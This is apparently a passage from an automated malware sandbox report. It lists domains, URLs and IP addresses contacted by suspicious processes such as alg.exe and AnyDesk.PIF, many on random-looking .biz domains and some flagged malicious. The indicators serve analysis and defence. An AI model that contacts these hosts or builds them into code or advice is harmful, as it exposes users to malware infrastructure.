                                                          		truefalse
                                                            		high
                                                            tltxn.biz
                                                            		18.208.156.248
                                                            		truefalse
                                                              		high
                                                              deoci.biz
                                                              		18.208.156.248
                                                              		truefalse
                                                                		high
                                                                krnsmlmvd.biz
                                                                		47.129.31.212
                                                                		truefalse
                                                                  		high
                                                                  uevrpr.biz
                                                                  		18.246.231.120
                                                                  		truefalse
                                                                    		high
                                                                    hagujcj.biz
                                                                    		18.208.156.248
                                                                    		truefalse
                                                                      		high
                                                                      gxe0.com
                                                                      		198.252.105.91
                                                                      		truefalse
                                                                        		high
                                                                        bumxkqgxu.biz
                                                                        		44.221.84.105
                                                                        		truefalse
                                                                          		high
                                                                          yhqqc.biz
                                                                          		34.211.97.45
                                                                          		truefalse
                                                                            		high
                                                                            ltpqsnu.biz
                                                                            		18.208.156.248
                                                                            		truefalse
                                                                              		high
                                                                              api.ipify.org
                                                                              		104.26.13.205
                                                                              		truefalse
                                                                                		high
                                                                                sctmku.biz
                                                                                		35.164.78.200
                                                                                		truefalse
                                                                                  		high
                                                                                  gcedd.biz
                                                                                  		13.251.16.150
                                                                                  		truefalse
                                                                                    		high
                                                                                    wxgzshna.biz
                                                                                    		72.52.178.23
                                                                                    		truefalse
                                                                                      		high
                                                                                      oshhkdluh.biz
                                                                                      		54.244.188.177
                                                                                      		truefalse
                                                                                        		high
                                                                                        opowhhece.biz
                                                                                        		18.208.156.248
                                                                                        		truefalse
                                                                                          		high
                                                                                          pectx.biz
                                                                                          		18.246.231.120
                                                                                          		truefalse
                                                                                            		high
                                                                                            jwkoeoqns.biz
                                                                                            		18.208.156.248
                                                                                            		truefalse
                                                                                              		high
                                                                                              jpskm.biz
                                                                                              		34.211.97.45
                                                                                              		truefalse
                                                                                                		high
                                                                                                cjvgcl.biz
                                                                                                		18.208.156.248
                                                                                                		truefalse
                                                                                                  		high
                                                                                                  ifsaia.biz
                                                                                                  		13.251.16.150
                                                                                                  		truefalse
                                                                                                    		high
                                                                                                    rynmcq.biz
                                                                                                    		54.244.188.177
                                                                                                    		truefalse
                                                                                                      		high
                                                                                                      fjumtfnz.biz
                                                                                                      		34.211.97.45
                                                                                                      		truefalse
                                                                                                        		high
                                                                                                        dyjdrp.biz
                                                                                                        		54.244.188.177
                                                                                                        		truefalse
                                                                                                          		high
                                                                                                          ypituyqsq.biz
                                                                                                          		3.94.10.34
                                                                                                          		truefalse
                                                                                                            		high
                                                                                                            tnevuluw.biz
                                                                                                            		35.164.78.200
                                                                                                            		truefalse
                                                                                                              		high
                                                                                                              znwbniskf.biz
                                                                                                              		47.129.31.212
                                                                                                              		truefalse
                                                                                                                		high
                                                                                                                ijnmvqa.biz
                                                                                                                		35.164.78.200
                                                                                                                		truefalse
                                                                                                                  		high
                                                                                                                  saytjshyf.biz
                                                                                                                  		44.221.84.105
                                                                                                                  		truefalse
                                                                                                                    		high
                                                                                                                    rrqafepng.biz
                                                                                                                    		47.129.31.212
                                                                                                                    		truefalse
                                                                                                                      		high
                                                                                                                      aatcwo.biz
                                                                                                                      		47.129.31.212
                                                                                                                      		truefalse
                                                                                                                        		high
                                                                                                                        uphca.biz
                                                                                                                        		44.221.84.105
                                                                                                                        		truefalse
                                                                                                                          		high
                                                                                                                          htwqzczce.biz
                                                                                                                          		172.234.222.143
                                                                                                                          		truefalse
                                                                                                                            		high
                                                                                                                            xyrgy.biz
                                                                                                                            		18.208.156.248
                                                                                                                            		truefalse
                                                                                                                              		high
                                                                                                                              banwyw.biz
                                                                                                                              		44.221.84.105
                                                                                                                              		truefalse
                                                                                                                                		high
                                                                                                                                myups.biz
                                                                                                                                		165.160.13.20
                                                                                                                                		truefalse
                                                                                                                                  		high
                                                                                                                                  pwlqfu.biz
                                                                                                                                  		34.246.200.160
                                                                                                                                  		truefalse
                                                                                                                                    		high
                                                                                                                                    zyiexezl.biz
                                                                                                                                    		18.208.156.248
                                                                                                                                    		truefalse
                                                                                                                                      		high
                                                                                                                                      hlzfuyy.biz
                                                                                                                                      		34.211.97.45
                                                                                                                                      		truefalse
                                                                                                                                        		high
                                                                                                                                        ssbzmoy.biz
                                                                                                                                        		18.141.10.107
                                                                                                                                        		truefalse
                                                                                                                                          		high
                                                                                                                                          knjghuig.biz
                                                                                                                                          		18.141.10.107
                                                                                                                                          		truefalse
                                                                                                                                            		high
                                                                                                                                            yunalwv.biz
                                                                                                                                            		208.100.26.245
                                                                                                                                            		truefalse
                                                                                                                                              		high
                                                                                                                                              brsua.biz
                                                                                                                                              		3.254.94.185
                                                                                                                                              		truefalse
                                                                                                                                                		high
                                                                                                                                                mgmsclkyu.biz
                                                                                                                                                		34.246.200.160
                                                                                                                                                		truefalse
                                                                                                                                                  		high
                                                                                                                                                  cpclnad.biz
                                                                                                                                                  		44.221.84.105
                                                                                                                                                  		truefalse
                                                                                                                                                    		high
                                                                                                                                                    ptrim.biz
                                                                                                                                                    		18.141.10.107
                                                                                                                                                    		truefalse
                                                                                                                                                      		high
                                                                                                                                                      ihcnogskt.biz
                                                                                                                                                      		35.164.78.200
                                                                                                                                                      		truefalse
                                                                                                                                                        		high
                                                                                                                                                        qpnczch.biz
                                                                                                                                                        		18.246.231.120
                                                                                                                                                        		truefalse
                                                                                                                                                          		high
                                                                                                                                                          mnjmhp.biz
                                                                                                                                                          		47.129.31.212
                                                                                                                                                          		truefalse
                                                                                                                                                            		high
                                                                                                                                                            acwjcqqv.biz
                                                                                                                                                            		18.141.10.107
                                                                                                                                                            		truefalse
                                                                                                                                                              		high
                                                                                                                                                              zrlssa.biz
                                                                                                                                                              		44.221.84.105
                                                                                                                                                              		truefalse
                                                                                                                                                                		high
                                                                                                                                                                pywolwnvd.biz
                                                                                                                                                                		54.244.188.177
                                                                                                                                                                		truefalse
                                                                                                                                                                  		high
                                                                                                                                                                  mjheo.biz
                                                                                                                                                                  		44.221.84.105
                                                                                                                                                                  		truefalse
                                                                                                                                                                    		high
                                                                                                                                                                    lrxdmhrr.biz
                                                                                                                                                                    		54.244.188.177
                                                                                                                                                                    		truefalse
                                                                                                                                                                      		high
                                                                                                                                                                      vrrazpdh.biz
                                                                                                                                                                      		34.211.97.45
                                                                                                                                                                      		truefalse
                                                                                                                                                                        		high
                                                                                                                                                                        cikivjto.biz
                                                                                                                                                                        		18.246.231.120
                                                                                                                                                                        		truefalse
                                                                                                                                                                          		high
                                                                                                                                                                          fgajqjyhr.biz
                                                                                                                                                                          		34.211.97.45
                                                                                                                                                                          		truefalse
                                                                                                                                                                            		high
                                                                                                                                                                            hehckyov.biz
                                                                                                                                                                            		44.221.84.105
                                                                                                                                                                            		truefalse
                                                                                                                                                                              		high
                                                                                                                                                                              kkqypycm.biz
                                                                                                                                                                              		18.141.10.107
                                                                                                                                                                              		truefalse
                                                                                                                                                                                		high
                                                                                                                                                                                bzkysubds.biz
                                                                                                                                                                                		3.94.10.34
                                                                                                                                                                                		truefalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  xlfhhhm.biz
                                                                                                                                                                                  		47.129.31.212
                                                                                                                                                                                  		truefalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    warkcdu.biz
                                                                                                                                                                                    		18.141.10.107
                                                                                                                                                                                    		truefalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      npukfztj.biz
                                                                                                                                                                                      		44.221.84.105
                                                                                                                                                                                      		truefalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        dwrqljrr.biz
                                                                                                                                                                                        		54.244.188.177
                                                                                                                                                                                        		truefalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          gytujflc.biz
                                                                                                                                                                                          		208.100.26.245
                                                                                                                                                                                          		truefalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            gvijgjwkh.biz
                                                                                                                                                                                            		3.94.10.34
                                                                                                                                                                                            		truefalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              sewlqwcd.biz
                                                                                                                                                                                              		44.221.84.105
                                                                                                                                                                                              		truefalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                vnvbt.biz
                                                                                                                                                                                                		18.246.231.120
                                                                                                                                                                                                		truefalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  nwdnxrd.biz
                                                                                                                                                                                                  		54.244.188.177
                                                                                                                                                                                                  		truefalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    qvuhsaqa.biz
                                                                                                                                                                                                    		54.244.188.177
                                                                                                                                                                                                    		truefalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      iuzpxe.biz
                                                                                                                                                                                                      		13.251.16.150
                                                                                                                                                                                                      		truefalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        nqwjmb.biz
                                                                                                                                                                                                        		35.164.78.200
                                                                                                                                                                                                        		truefalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          wllvnzb.biz
                                                                                                                                                                                                          		18.141.10.107
                                                                                                                                                                                                          		truefalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            kvbjaur.biz
                                                                                                                                                                                                            		54.244.188.177
                                                                                                                                                                                                            		truefalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              napws.biz
                                                                                                                                                                                                              		35.164.78.200
                                                                                                                                                                                                              		truefalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                cvgrf.biz
                                                                                                                                                                                                                		54.244.188.177
                                                                                                                                                                                                                		truefalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  lpuegx.biz
                                                                                                                                                                                                                  		82.112.184.197
                                                                                                                                                                                                                  		truefalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    vcddkls.biz
                                                                                                                                                                                                                    		18.141.10.107
                                                                                                                                                                                                                    		truefalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      wluwplyh.biz
                                                                                                                                                                                                                      		18.141.10.107
                                                                                                                                                                                                                      		truefalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        vyome.biz
                                                                                                                                                                                                                        		18.246.231.120
                                                                                                                                                                                                                        		truefalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          dlynankz.biz
                                                                                                                                                                                                                          		85.214.228.140
                                                                                                                                                                                                                          		truefalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            Contacted URLs

                                                                                                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                            http://lpuegx.biz/epvislkuanodptrue
                                                                                                                                                                                                                              http://npukfztj.biz/coprggngfjfalse
                                                                                                                                                                                                                                http://sctmku.biz/nipbgjpspvtyfefalse
                                                                                                                                                                                                                                  http://neazudmrq.biz/qffalse
                                                                                                                                                                                                                                    http://sewlqwcd.biz/bhwfalse
                                                                                                                                                                                                                                      http://vgypotwp.biz/ojuwxxtrue
                                                                                                                                                                                                                                        http://vnvbt.biz/leiqqbxsfalse
                                                                                                                                                                                                                                          http://jpskm.biz/wsppsfoumisskbofalse
                                                                                                                                                                                                                                            http://uaafd.biz/cjefalse
                                                                                                                                                                                                                                              http://warkcdu.biz/fvijpyejxccmhfmifalse
                                                                                                                                                                                                                                                http://rynmcq.biz/qtsndkyutrue
                                                                                                                                                                                                                                                  http://xccjj.biz/nefalse
                                                                                                                                                                                                                                                    http://bzkysubds.biz/dfpdwbwsufalse
                                                                                                                                                                                                                                                      http://fwiwk.biz/hgefalse
                                                                                                                                                                                                                                                        http://krnsmlmvd.biz/ymqhfalse
                                                                                                                                                                                                                                                          http://jdhhbs.biz/vudapeuvfalse
                                                                                                                                                                                                                                                            http://jwkoeoqns.biz/vvfalse
                                                                                                                                                                                                                                                              http://qaynky.biz/hyoldlagxghmkubfalse
                                                                                                                                                                                                                                                                http://fgajqjyhr.biz/jgidxganmacktdfalse
                                                                                                                                                                                                                                                                  http://pwlqfu.biz/poiwrabuiumompmafalse
                                                                                                                                                                                                                                                                    http://typgfhb.biz/ipkofalse
                                                                                                                                                                                                                                                                      http://lpuegx.biz/hwverablwtpyptrue
                                                                                                                                                                                                                                                                        http://przvgke.biz/nchhumsfalse
                                                                                                                                                                                                                                                                          http://wluwplyh.biz/vennfalse
                                                                                                                                                                                                                                                                            http://znwbniskf.biz/cwfkxfalse
                                                                                                                                                                                                                                                                              http://pywolwnvd.biz/hvedkntqmbntrue
                                                                                                                                                                                                                                                                                http://oflybfv.biz/bfalse
                                                                                                                                                                                                                                                                                  http://ypituyqsq.biz/araofalse
                                                                                                                                                                                                                                                                                    http://qpnczch.biz/vjmsosrxfalse
                                                                                                                                                                                                                                                                                      http://npukfztj.biz/frknndojmsuqfalse
                                                                                                                                                                                                                                                                                        http://ihcnogskt.biz/htafalse
                                                                                                                                                                                                                                                                                          http://iuzpxe.biz/kjhhbldlylrmqycfalse
                                                                                                                                                                                                                                                                                            http://przvgke.biz/ikqsakdpetffalse
                                                                                                                                                                                                                                                                                              http://vnvbt.biz/cpmmdtwjhfebkhhdfalse
                                                                                                                                                                                                                                                                                                http://przvgke.biz/saqmfalse
                                                                                                                                                                                                                                                                                                  http://qcrsp.biz/ftwdfalse
                                                                                                                                                                                                                                                                                                    http://sewlqwcd.biz/dabmiwkjyfalse
                                                                                                                                                                                                                                                                                                      http://tbjrpv.biz/ayxmvafalse
                                                                                                                                                                                                                                                                                                        http://typgfhb.biz/hcvbujevnkcpfalse
                                                                                                                                                                                                                                                                                                          http://xyrgy.biz/tqibqwdnnfalse
                                                                                                                                                                                                                                                                                                            http://vgypotwp.biz/fgevaiedsfhmtrue
                                                                                                                                                                                                                                                                                                              http://ftxlah.biz/rxjmtwfalse
                                                                                                                                                                                                                                                                                                                http://giliplg.biz/kfalse
                                                                                                                                                                                                                                                                                                                  http://zgapiej.biz/pxfalse
                                                                                                                                                                                                                                                                                                                    http://damcprvgv.biz/bdghcfalse
                                                                                                                                                                                                                                                                                                                      http://fgajqjyhr.biz/agymgtakvgyravfalse
                                                                                                                                                                                                                                                                                                                        http://ocsvqjg.biz/qwcggmenbmxayfalse
                                                                                                                                                                                                                                                                                                                          http://apzzls.biz/squfalse
                                                                                                                                                                                                                                                                                                                            http://nqwjmb.biz/ufwhufalse
                                                                                                                                                                                                                                                                                                                              http://xlfhhhm.biz/wjfalse
                                                                                                                                                                                                                                                                                                                                http://jlqltsjvh.biz/jvecbpfalse
                                                                                                                                                                                                                                                                                                                                  http://knjghuig.biz/xyuwwggfofalse
                                                                                                                                                                                                                                                                                                                                    http://dwrqljrr.biz/xubhwtrue
                                                                                                                                                                                                                                                                                                                                      https://gxe0.com/yak2/233_Juqmtmyadyytrue
                                                                                                                                                                                                                                                                                                                                        http://hehckyov.biz/sdgvcmfofalse
                                                                                                                                                                                                                                                                                                                                          http://hagujcj.biz/rqtfalse
                                                                                                                                                                                                                                                                                                                                            http://lpuegx.biz/frjrhbtrue
                                                                                                                                                                                                                                                                                                                                              https://api.ipify.org/false
                                                                                                                                                                                                                                                                                                                                                http://qvuhsaqa.biz/nfbfdhwgbtrue
                                                                                                                                                                                                                                                                                                                                                  http://vjaxhpbji.biz/pjqqchtrue
                                                                                                                                                                                                                                                                                                                                                    http://brsua.biz/fflfjsnvrvmguebcfalse
                                                                                                                                                                                                                                                                                                                                                      http://fwiwk.biz/sycehlfxifnifalse
                                                                                                                                                                                                                                                                                                                                                        http://napws.biz/fhfpwltbvvfalse
                                                                                                                                                                                                                                                                                                                                                          http://dyjdrp.biz/shrtrue
                                                                                                                                                                                                                                                                                                                                                            http://cvgrf.biz/iwtyrexjutrue
                                                                                                                                                                                                                                                                                                                                                              http://mjheo.biz/lelrjltwmlswdfalse
                                                                                                                                                                                                                                                                                                                                                                http://ftxlah.biz/pnuofhgyvsfalse
                                                                                                                                                                                                                                                                                                                                                                  http://ijnmvqa.biz/swkrgjmrquigfalse
                                                                                                                                                                                                                                                                                                                                                                    http://dwrqljrr.biz/pgswneolngwqmbmatrue
                                                                                                                                                                                                                                                                                                                                                                      http://nlscndwp.biz/xkblisebtrue
                                                                                                                                                                                                                                                                                                                                                                        http://krnsmlmvd.biz/frfalse
                                                                                                                                                                                                                                                                                                                                                                          http://acwjcqqv.biz/obyashlqvnfalse
                                                                                                                                                                                                                                                                                                                                                                            http://zrlssa.biz/lspnhjimgtskiesmfalse

                                                                                                                                                                                                                                                                                                                                                                              URLs from Memory and Binaries

                                                                                                                                                                                                                                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                                                              http://165.160.13.20/vblbtbbfmivxyjamkalg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2297056375.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2295316988.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                http://82.112.184.197/ceginiuaduqvialg.exe, 00000022.00000003.2242323432.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2627341141.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2430544276.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2122882435.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2296248107.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2274219091.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2141791316.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2106221522.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2195841831.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2320571977.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2547916936.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2004099122.000000000015E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2354326017.000000000015E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    http://82.112.184.197/uiNative_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      http://172.234.222.138:80/ikqsakdpetfalg.exe, 00000022.00000003.1912810265.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1799180308.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1797273524.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.1786459998.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://34.211.97.45:80/wsppsfoumisskboalg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          https://scss.adobesc.comreasoncom.adobe.review.sdkalg.exe, 00000022.00000003.2478496148.0000000000530000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138:80/sycehlfxifnialg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              http://18.141.10.107/bBNative_neworigin.exe, 00000020.00000002.1953055035.0000000005383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://34.211.97.45/nfkpualg.exe, 00000022.00000003.2526697223.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2528462938.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  http://208.100.26.245:80/soxbjfwpcadsyansOhalg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://82.112.184.197:80/yqjfubvmytgoPalg.exe, 00000022.00000003.2003839960.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://172.234.222.138/byaNative_neworigin.exe, 00000020.00000003.1758511050.0000000005419000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758638559.0000000005432000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000003.1758806915.0000000005447000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        https://api.ipify.org/tNative_neworigin.exe, 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://44.221.84.105/xjaepinalg.exe, 00000022.00000003.2411018464.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1682798891.00000000029B3000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1781580936.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.00000000029BD000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020C49000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1663538271.000000002218B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1761274523.00000000224F5000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 0000001F.00000000.1665063094.0000000000416000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              http://172.234.222.138/sycehlfxifnialg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2184135314.000000000018A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  http://34.211.97.45/wsppsfoumisskboalg.exe, 00000022.00000003.2337200289.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                    http://34.246.200.160:80/umftqsqqalg.exe, 00000022.00000003.2195214588.0000000000196000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2207793002.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                      http://x1.c.lencr.org/0Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        http://x1.i.lencr.org/0Native_neworigin.exe, 00000020.00000002.1953055035.0000000005370000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C60000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1968549367.0000000006C76000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1931595213.0000000003096000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                          http://54.244.188.177:80/jfcmbfmivxyjaXalg.exe, 00000022.00000003.2307499755.0000000000196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                            http://82.112.184.197/csleNative_neworigin.exe, 00000020.00000002.1955667464.00000000053EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                                                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/vxagkgmfvalg.exe, 00000022.00000003.2241252396.0000000000179000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000022.00000003.2224502951.0000000000179000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                  https://gxe0.com/AnyDesk.PIF, 0000000F.00000002.1668921503.00000000008DF000.00000004.00000020.00020000.00000000.sdmptrue

                                                                                                                                                                                                                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                                    3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                    		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    34.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                    		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                    		gxe0.comCanada
                                                                                                                                                                                                                                                                                                                                                                                                                                    		20068HAWKHOSTCAfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                    		htwqzczce.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    18.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                    		kcyvxytog.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                    		apzzls.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                    		yunalwv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    35.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                    		sctmku.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                    		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                    		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    51.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                    		s82.gocheapweb.comFrance
